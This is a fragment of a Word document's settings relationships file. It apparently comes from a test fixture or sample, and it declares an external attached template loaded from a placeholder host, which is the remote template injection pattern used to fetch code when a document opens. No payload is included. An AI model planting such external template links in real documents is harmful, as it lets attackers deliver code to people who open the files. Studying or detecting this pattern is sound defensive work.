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AttachedTemplate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word/_rels/settings.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdAttachedTemplate" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://candidate.example.invalid/dcab-template.dotx" TargetMode="External"/></Relationships>
</file>